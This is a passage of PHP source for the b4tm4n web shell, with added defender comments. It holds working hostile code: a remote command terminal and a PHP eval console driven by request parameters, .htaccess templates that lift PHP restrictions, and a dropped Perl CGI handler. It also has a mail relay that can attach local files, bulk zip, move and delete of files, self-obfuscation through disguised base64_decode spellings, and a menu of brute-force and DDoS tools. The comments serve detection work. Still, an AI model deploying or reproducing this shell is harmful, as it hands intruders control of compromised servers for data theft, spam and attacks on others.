if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals")
{
ob_clean();
$command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
@chdir($dir);
// Output is converted to UTF-8; non-Unix hosts are assumed to emit
// Windows-1251. Unix() is defined outside this view.
$charset='UTF-8';
if(!Unix())
{
$charset='Windows-1251';
}
$ret=iconv($charset,'UTF-8',Execute($command));
print $ret;
exit;
}
elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir")
{
// Tracks "cd" typed in the terminal: the working directory is kept in the
// session rather than in a live shell process.
ob_clean();
$command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
if (preg_match('/cd (.*)/',$command,$dirx))
{
if ($dirx[1]=='..')
{
// Go up one level by cutting at the last separator.
$dir=substr($dir,0,strrpos($dir,_));
if (strlen($dir)<=2) $dir=$dir._;
}
else
{
if (is_dir($dirx[1]))
{
$dir=realpath($dirx[1]);
}
}
}
$_SESSION['c']=urle($dir);
print '$ '.$dir.':';
exit;
}
}
// x=connect — prints a form only; its markup is not visible in this copy and
// no request handling for it appears in this block.
if($_REQUEST['x']=="connect")
{
printf("
");
}
// x=htaccess — prints two directive templates: php_value/php_flag lines that
// would loosen PHP restrictions, and Apache access directives.
// In the visible code the templates are only printed, not written to disk.
// Defender note: these directives in a .htaccess under the web root are an
// indicator in themselves. Setting AllowOverride to None where per-directory
// overrides are not needed prevents such files from taking effect.
if($_REQUEST['x']=="htaccess")
{
$php_ini=array(
"php_value upload_max_filesize 32M",
"php_value post_max_size 32M",
"php_flag safe_mode Off",
"php_value disable_functions null",
"php_flag safe_mode_gid Off",
"php_value open_basedir $dir",
"php_flag register_globals On",
"php_flag exec On",
"php_flag shell_exec On");
$htaccess=array(
"Options All",
"Allow From All",
"Satisfy Any");
printf("
",implode($php_ini,"\n"),implode($htaccess,"\n"));
}
// x=php — PHP code console.
// The request's "code" / "codex" value is passed to Evil() (defined outside
// this view; by its name and use it presumably evaluates the string as PHP —
// confirm). The second argument distinguishes the two entry points.
// Defender note: request bodies carrying PHP source to a single script URL are
// what this looks like on the wire; WAF or request-body logging can surface it.
if($_REQUEST['x']=="php")
{
// Example snippets offered in the form; all of them enumerate the runtime.
$exp=array(
"print_r(get_extension_funcs('Core'));",
"print_r(get_loaded_extensions());",
"print_r(ini_get_all('pcre'));",
"print_r(ini_get_all());",
"print_r(get_defined_constants());",
"print_r(get_defined_functions());",
"print_r(get_declared_classes());");
printf("
",implode($exp,"\n"));
if(any("code",$_REQUEST))
{
ob_clean();
$code=trim($_REQUEST['code']);
$evil=Evil($code);
exit;
}
if(any("codex",$_REQUEST))
{
ob_clean();
$code=trim($_REQUEST['codex']);
$evil=Evil($code,true);
exit;
}
}
// x=perl — drops a Perl CGI test script and a .htaccess that makes Apache
// execute files with the ".ler" extension as CGI.
// Defender note: concrete artefacts from this block are a "cgi-bin" directory
// under the current path containing "perl.ler" and ".htaccess" with the
// AddHandler/AddType lines below. Mapping an unusual extension to cgi-script
// in a per-directory .htaccess is worth alerting on.
if($_REQUEST['x']=="perl")
{
print 'PHP Perl Class: '.(class_exists('Perl')?"
ON":"
OFF").'
';
// Locate a Perl interpreter for the script's shebang line.
if(Unix())
{
if(file_exists("/usr/bin/perl"))
{
$path_perl="/usr/bin/perl";
}
else
{
$path_perl="/usr/bin/env perl";
}
}
else
{
// On Windows $path_perl stays unset when none of these paths exist.
if(file_exists("C:\\perl\bin\perl.exe"))
{
$path_perl="C:\\perl\bin\perl.exe";
}
elseif(file_exists("C:\\wamp\bin\perl.exe"))
{
$path_perl="C:\\wamp\bin\perl.exe";
}
elseif(file_exists("C:\\xampp\perl\bin\perl.exe"))
{
$path_perl="C:\\xampp\perl\bin\perl.exe";
}
}
// CGI script body: prints a header and a fixed marker string.
$script=array(
"#!$path_perl",
"use strict;",
"use warnings;",
"use CGI;",
"print CGI::header();",
"print 'k4mpr3t on CGI';");
// Per-directory Apache config enabling CGI execution for ".ler" files.
$htaccess=array(
"Options +ExecCGI +SymLinksIfOwnerMatch",
"DirectoryIndex index.ler",
"AddType application/x-httpd-cgi .ler",
"AddHandler cgi-script .ler");
$path=$dir._.'cgi-bin';
$file=$path._.'perl.ler';
$file2=$path._.'.htaccess';
$scripts=implode($script,"\n");
$htaccesss=implode($htaccess,"\n");
// Create directory and files only when they do not exist yet; both files
// are set to mode 0755.
if(!is_dir($path))
{
mkdir($path,0755);
}
if(!is_file($file))
{
$op=fopen($file,'w+');
fwrite($op,$scripts);
fclose($op);
chmod($file,0755);
}
if(!is_file($file2))
{
$op=fopen($file2,'w+');
fwrite($op,$htaccesss);
fclose($op);
chmod($file2,0755);
}
// $redirect is not used in the output as it appears in this copy.
$redirect=GetUrlFromPath($file);
printf("Tested ->
Link");
// Only when the PECL "Perl" class is loaded: run Perl inside the PHP process.
if (class_exists('Perl'))
{
//$perl=Perl::getInstance();
$perl=new Perl();
$perl->eval("print \"Executing Perl code in PHP\n\"");
print "Hello from PHP! ";
//$perl=new Perl();
$perl->require($file);
$val=$perl->somePhpFunc('test');
print $val;
}
}
// x=mail — sends e-mail through the host's mail() configuration.
// All envelope fields, the HTML body and an optional attachment path come
// from the request; the attachment is read from the server's own filesystem.
// Defender note: this turns the compromised host into a mail relay (spam or
// phishing sent from the victim's IP/domain reputation) and is a second
// exfiltration path, since any readable local file can be attached. Outbound
// mail volume and MTA logs for the web server account are where it shows.
if($_REQUEST['x']=="mail")
{
printf("
",php_self);
if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send')
{
ob_clean();
$from=$_REQUEST['from'];
$reply=$_REQUEST['reply'];
$to=$_REQUEST['to'];
$cc=$_REQUEST['cc'];
$bcc=$_REQUEST['bcc'];
$subject=$_REQUEST['subject'];
$msg=$_REQUEST['message'];
$attachment=$_REQUEST['attachment'];
// MIME boundary derived from the current time.
$uid=md5(uniqid(time()));
// Header values are inserted without any filtering of line breaks.
$headers[]="From: $from";
$headers[]="Reply-To: $reply";
$headers[]="To: $to";
if(!empty($cc)) $headers[]='Cc: $cc';
if(!empty($bcc)) $headers[]='Bcc: $bcc';
$headers[]="MIME-Version: 1.0";
$headers[]="Content-Type: multipart/mixed; boundary=\"$uid\"";
// First MIME part: the HTML message body.
$messages[]="--$uid";
$messages[]="Content-type: text/html; charset=\"iso-8859-1\"";
$messages[]="Content-Transfer-Encoding: 8bit";
$messages[]="";
$messages[]="$msg";
$messages[]="";
if(is_file($attachment))
{
// Second MIME part: the local file, base64-encoded. The closing boundary
// is only appended inside this branch.
$content=file_get_contents($attachment);
$content=chunk_split(base64_encode($content));
$name=basename($attachment);
$mime=mime_content_type($attachment);
$messages[]="--$uid";
$messages[]="Content-Type: $mime; name=\"$name\"";
$messages[]="Content-Transfer-Encoding: base64";
$messages[]="Content-Disposition: attachment";
$messages[]="";
$messages[]="$content";
$messages[]="";
$messages[]="--$uid--";
}
$message=implode("\r\n",$messages);
$header=implode("\r\n",$headers);
if(mail($to,$subject,$message,$header))
{
print "Email Send";
}
else
{
$error=error_get_last();
print "Error :" . $error['message'];
}
exit;
}
}
// x=process — process listing and termination.
// Lists processes with "ps aux" (Unix) or "tasklist" (otherwise) through
// Execute(), and on xa=kill builds kill/taskkill command lines from the
// request's "pid" and "name" values, which are interpolated into the command
// string without escaping.
// Defender note: ps/tasklist/kill/taskkill launched by the web server account
// are process-creation events that host telemetry should flag.
if($_REQUEST['x']=='process')
{
printf("
");
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill")
{
$pid=$_REQUEST['pid'];
$name=$_REQUEST['name'];
if(Unix())
{
// Two attempts; only the result of the second decides the message.
$kill=Execute("kill 9 $pid");
$kill=Execute("kill 9 $name");
if($kill) print '
Process Killed';
}
else
{
$kill=Execute("taskkill /f /pid $pid");
$kill=Execute("taskkill /f /im $name");
if($kill) print '
Process Killed';
}
}
// $ret holds the listing; the markup that displayed it is not visible in
// this copy.
if(Unix())
{
$ret=iconv('UTF-8','UTF-8',Execute('ps aux'));
print '
';
}
else
{
$ret=iconv('Windows-1251','UTF-8',Execute('tasklist'));
print '
';
}
}
// x=shells and x=symlink are placeholders in this version: they only print a
// "Coming Soon" message and perform no action.
if($_REQUEST['x']=='shells')
{
print "Coming Soon";
}
if($_REQUEST['x']=='symlink')
{
print "Coming Soon";
}
// x=account — changes the shell's own login credentials by rewriting the
// script file in place.
// $account (defined outside this view) holds the stored username at [0] and
// the stored password hash at [1]; B64D()/B64E() are defined outside this
// view (presumably base64 decode/encode — confirm).
// Defender note: the credentials are literals inside the script, so every
// credential change alters the file's hash and mtime. The username is stored
// B64E-encoded and the password as sha1(md5(password)); both are recoverable
// from a copy of the file during incident response.
if($_REQUEST['x']=="account")
{
printf("
",B64D($account[0]));
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change")
{
$filename=script_filename;
// Variable names are crossed relative to the form fields: $username holds
// "change-password" and $password holds "change-username". The uses below
// are crossed the same way, so the username is what gets B64E-encoded and
// the password is what gets hashed.
$username=$_REQUEST['change-password'];
$password=$_REQUEST['change-username'];
if (!empty($username)&&!empty($password))
{
// Pass 1: replace every occurrence of the stored username literal.
$user_from=$account[0];
$user_to=B64E($password);
$content=file_get_contents($filename);
$chunk=explode($user_from,$content);
$content=implode($user_to,$chunk);
$change=file_put_contents($filename,$content);
// Pass 2: replace every occurrence of the stored password hash.
$pass_from=$account[1];
$pass_to=sha1(md5($username));
$content=file_get_contents($filename);
$chunk=explode($pass_from,$content);
$content=implode($pass_to,$chunk);
$change=file_put_contents($filename,$content);
// Only the result of the second write is checked.
if($change)
{
session_destroy();
session_regenerate_id();
header('location:'.php_self);
}
else
{
printf("Error change account");
}
}
else
{
printf("
Mistakes !");
}
}
}
if($_REQUEST['x']=="action")
{
// Bulk action, step 1: collect the ticked entries ("chk") and the chosen
// action, then either redirect (single-file copy/move) or print a
// confirmation form. Nothing is modified on disk in this step.
$files=any('chk',$_REQUEST)?$_REQUEST['chk']:array();
$value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option'];
// $tmp becomes a comma-separated list of the decoded paths; it is passed to
// the confirmation form and comes back as the "tmp" request value in step 2.
$tmp="";
$row="";
$count_dirs=0;
$count_files=0;
foreach($files as $file)
{
if(is_dir(urld($file)))
{
$count_dirs++;
}
if(is_file(urld($file)))
{
$count_files++;
}
$row.="
".urld($file)." |
";
$tmp.=urld($file).",";
}
// A single selection with copy/move reuses the single-file a=cp / a=mv pages.
if(count($files)==1&&$value=='copy')
{
header('location:'.php_self.'?a=cp&r='.$files[0]);
}
if(count($files)==1&&$value=='move')
{
header('location:'.php_self.'?a=mv&r='.$files[0]);
}
// Confirmation form for delete (no target location needed).
if(!any('xa',$_REQUEST)&&$value=='delete')
{
printf("
Dir's: [%s] File's: [%s]
",
$count_dirs,
$count_files,
$row,
$value,
$tmp);
}
// Confirmation form for every other action; additionally receives the
// current directory as the default target location.
if(!any('xa',$_REQUEST)&&$value!='delete')
{
printf("
Dir's: [%s] File's: [%s]
",
$count_dirs,
$count_files,
$row,
$value,
$tmp,
$dir._);
}
// Bulk action, step 2 (xa=option): performs copy / move / delete / zip /
// unzip on the path list carried in "tmp", with "newloc" as the target.
// CopyRecursive(), MoveRecursive() and Remove() are defined outside this view.
// Defender note: both the path list and the target are request values, so
// this step can archive whole directory trees for collection, unpack archives
// into arbitrary directories, or remove files in bulk. Newly created .zip
// files and mass deletions by the web server account are the traces it leaves.
if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option')
{
// The list is split on commas, so a path containing a comma is broken up.
$files=array_filter(explode(',',$_REQUEST['tmp']));
$newloc=trim(@$_REQUEST['newloc']);
$succ=0;
$fail=0;
if($_REQUEST['action-option']=='copy')
{
// Target must be an existing directory; entries keep their base name.
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(CopyRecursive($file,rtrim($newloc,_)._.basename($file)))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
if($_REQUEST['action-option']=='move')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(MoveRecursive($file,rtrim($newloc,_)._.basename($file)))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
if($_REQUEST['action-option']=='delete')
{
foreach($files as $file)
{
if(Remove($file))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
if($_REQUEST['action-option']=='zip')
{
// The archive path must end in ".zip"; an existing archive is overwritten.
if(end(explode(".",$newloc))=='zip')
{
$zip=new ZipArchive;
if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE)
{
foreach($files as $file)
{
if(is_dir($file))
{
// Directories are added recursively; entry names are made relative
// by replacing the selected path with its base name.
$zip->addEmptyDir(basename($file));
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($file),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($recur as $key => $val)
{
if(basename($key)!="..")
{
if(is_dir($key))
{
$zdir=str_replace($file,basename($file),realpath($key));
$zip->addEmptyDir($zdir);
}
elseif(is_file($key))
{
$zfile=str_replace($file,basename($file),realpath($key));
$zip->addFile(realpath($key),$zfile);
}
}
}
}
elseif(is_file($file))
{
$zip->addFile($file,basename($file));
}
}
$zip->close();
print 'Zip Created';
}
else
{
print 'Failed';
}
}
else
{
print 'Extension must Zip';
}
}
if($_REQUEST['action-option']=='unzip')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
// Only entries whose name ends in ".zip" are extracted; everything else
// counts as a failure. Entry names inside the archive are not inspected
// before extractTo().
if(end(explode(".",$file))=='zip')
{
$zip=new ZipArchive;
if ($zip->open($file)===TRUE)
{
$zip->extractTo($newloc);
$zip->close();
$succ++;
}
else
{
$fail++;
}
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
}
}
// x=find — recursive search below $dir for paths whose resolved name contains
// the request's "find-value" substring.
// Defender note: a full recursive walk of the tree is a burst of stat/read
// activity by the web server account, typically used to locate configuration
// or credential files after initial access.
if($_REQUEST['x']=="find")
{
// The iterator is built before the search term is checked.
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dir),
RecursiveIteratorIterator::LEAVES_ONLY
);
if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value']))
{
$result="";
$res_=0;
foreach ($recur as $key => $val)
{
if(basename($key)!="..")
{
// Case-sensitive substring match against the full resolved path, so
// directory names match as well as file names.
if(strpos(realpath($key),$_REQUEST['find-value'])!== false)
{
// Seven arguments are supplied (parent directory three times, full path
// twice, base name, mtime); most of their placeholders were in markup
// that is not visible in this copy.
$result.=sprintf("
|
%s |
%s |
%s |
",
substr(realpath($key),0,strrpos(realpath($key),_)),
substr(realpath($key),0,strrpos(realpath($key),_)),
substr(realpath($key),0,strrpos(realpath($key),_)),
realpath($key),
realpath($key),
basename(realpath($key)),
GetFileTime(realpath($key),'modify')
);
$res_++;
}
}
}
printf("
No. |
Directory |
Name |
Modified |
%s
",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result);
}
else
{
// No search term: print the empty search form (markup not visible here).
print "
";
}
}
// x=update — version check against the author's public repository.
// Downloads the upstream script through GetUrlContent() (defined outside this
// view), pulls three characters after the text "current_version" and compares
// them with the hard-coded local version.
// Defender note: the URL below is a network indicator from this sample; a web
// server fetching a .php file from raw.githubusercontent.com is unusual
// enough to alert on in egress or proxy logs. The hard-coded version number
// identifies this sample as release 2.6 of the tool.
if($_REQUEST['x']=="update")
{
$link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';
$current_version=2.6; //New Version Released
if($config['debug']==true)
{
// Debug mode fakes a newer version instead of making the network request.
$latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1
}
else
{
$git_script=GetUrlContent($link_update);
// 16 = length of "current_version" plus the "=" that follows it.
$get_version=strpos($git_script,"current_version");
$version=substr($git_script,$get_version+16,3);
// Fall back to the local version when the extracted text is not numeric.
$latest_version=is_numeric($version)?$version:$current_version;
}
$status="";
if((float)$latest_version>(float)$current_version)
{
if($config['debug']==true)
{
$status.='New Version Available '.$latest_version.'
Setting Debug to False for Activate this Feature';
}
else
{
$status.='New Version Available '.$latest_version.'
Download -> [
link]';
}
}
else
{
$status.='Latest Version '.$current_version;
}
Printf("
%s
",$status);
}
// x=self-encryptor — writes an obfuscated copy of this script next to itself.
// It reads its own source, cuts it after the stored password string, swaps the
// "$x_" variable prefix for a random short name and picks one of several
// disguised spellings of "base64_decode".
// The assembly of the output ($src_) appears to have been lost from this copy
// (it is only assigned empty strings here), so the exact wrapper format cannot
// be stated from this view.
// Defender note: the $b64 alternatives below are stable static indicators:
// an octal/hex-escaped "base64_decode", and strrev()/concatenation of its
// fragments ("edoced_46esab"). The default output name is "bat_encrypt.php"
// in the script's own directory. Signature matching on variable names will
// not survive this step; match on the disguised function-name patterns and on
// behaviour instead.
if($_REQUEST['x']=="self-encryptor")
{
if($php_script=htmlentities(@file_get_contents(__FILE__)))
{
// Locate the stored password string in the source and keep what follows
// it (48 characters past the start of the match).
$asu=strpos($php_script,$_SESSION["action"]["password"]);
$temp=substr($php_script,$asu+48);
// Random variable names: 1-3 and 2-5 lowercase letters.
$rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3));
$rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5));
// Disguised spellings of the decoder function name.
$b64=array(
'"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"',
'strrev("ed"."oce"."d_4"."6es"."ab")',
'strrev("e"."doc"."ed_"."46e"."sab")',
'"b"."as"."e6"."4_"."d"."ec"."o"."de"',
'"ba"."se"."6"."4_d"."e"."cod"."e"'
);
$rand_b64=array_rand($b64);
$rand3=$b64[$rand_b64];
// Two generated assignments — credentials ("username:password" from the
// session) and the decoder name — emitted in random order.
$var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";';
$var2=$rand2.'='.$rand3.';';
$var=array(
$var1.$var2,
$var2.$var1
);
$rand_var=array_rand($var);
$rand4=$var[$rand_var];
$self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random
$src_='';
$src_.='';
// Output file name comes from the request; written beside this script.
$name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php';
$file=dirname(__FILE__)._.$name;
$op=fopen($file,'w+');
fwrite($op,$src_);
fclose($op);
printf("
SELF ENCRYPT CREATED !!!
Link -> %s
",GetUrlFromPath($file),$name);
}
else
{
print "
SELF ENCRYPT ENABLE !!!";
}
}
}
/* START CUSTOM TOOLZ */
// "z" — menu of the bundled add-on tools. This block only renders the menu via
// MenuTools() (defined outside this view); the tools themselves are not in
// this part of the file. $z is assigned but not used in the visible code.
// Defender note: the tool keys below (port scanner, brute-forcers, mass tools,
// DDoS) show that this shell is meant to use the compromised host as a launch
// point against third parties, so outbound scanning or flood traffic from the
// web server is an expected follow-on indicator. The keys also appear as
// values of the "z" request parameter and can be matched in access logs.
if(any("z",$_REQUEST))
{
$z=$_REQUEST['z'];
print MenuTools(array(
"target-map"=>array("title"=>"Target Map","ver"=>"1.0","auth"=>"k4mpr3t"),
"port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"),
"script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"),
"encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"),
"form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
"login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
"mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"),
"ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"),
));
print "
";
}
/* END CUSTOM TOOLZ */
printf("